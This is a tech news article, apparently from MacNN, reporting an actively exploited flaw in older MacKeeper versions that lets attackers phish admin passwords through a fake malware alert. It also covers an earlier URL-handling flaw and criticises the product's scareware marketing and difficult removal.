Users of controversial utility software MacKeeper who are not up-to-date on the latest version are
vulnerable to a serious security flaw that can trick users into passing their admin passwords onto attackers, thus leaving the Mac vulnerable to a complete remote takeover. Though the problem has been fixed in version 3.4.1 of the much-maligned "cleanup" utility, the flaw is being actively exploited in the wild by attackers preying on users who have not updated.
Earlier versions of MacKeeper offered a Remote Code Execution (RCE) backdoor that allowed hackers to inject code redirecting the program to an infected webpage hosting malware known as OSX/Agent-ANTU, which would then use a single line of JavaScript to produce a fake malware report that looks like it comes from MacKeeper, requesting the user's administrative login credentials.
Once obtained, the attacker could then install a bot program to collect system details, and execute commands remotely. Attacks "in the wild" were spotted just a few days after the initial proof-of-concept and documentation of the flaw were published. Because many of the company's 20 million users were enticed to download the program through "scareware" ads or other aggressive sales tactics, they may be loathe to update -- or believe the program has been removed, when in fact it is exceedingly difficult to remove completely, leaving the host Mac still vulnerable to the attack.
An investigation of the software
by Mac-Forums found that it did do some of the advertised functions, but that everything the program did that was beneficial could also be done by a range of either built-in Mac utilities or free third-party programs that do not rely on "scareware" tactics. The analysis of the program found that while it was not itself malicious in nature, it was poorly executed even in its advertised functions, and when one added the extortionate fear-based advertising, poor product support, and deliberately-obtuse full removal difficulty, was a poor choice compared to excellent free third-party or Apple-included utility apps.
This is the second serious security flaw to be found in the program in as many months; an earlier flaw was discovered
last month, which was caused by MacKeeper's ignoring of an Apple guideline regarding input validation for custom URLs -- the same technology that allows Mac and iOS users to tap on a phone number or date to launch a given application, or to create non-standard URLs such as direct iTunes links. Apple cautions developers that they must use input validation to be sure that the chosen URL is legit and not a specially-crafted malicious site, but MacKeeper's developers apparently disregarded that, creating a zero-day exploit that could wreak havoc if users accidentally click on a malicious URL.
Instructions on how to fully remove MacKeeper can be found
here.
MacNN recommends that users avoid this and future issues by uninstalling the program completely. Readers may occasionally see ads for the product on
MacNN, due to our keyword-based advertising system and the distributor's aggressive ad buying, but it is emphatically not endorsed by the editorial staff of
MacNN, who are independent of the advertising aggregators we use to support the site.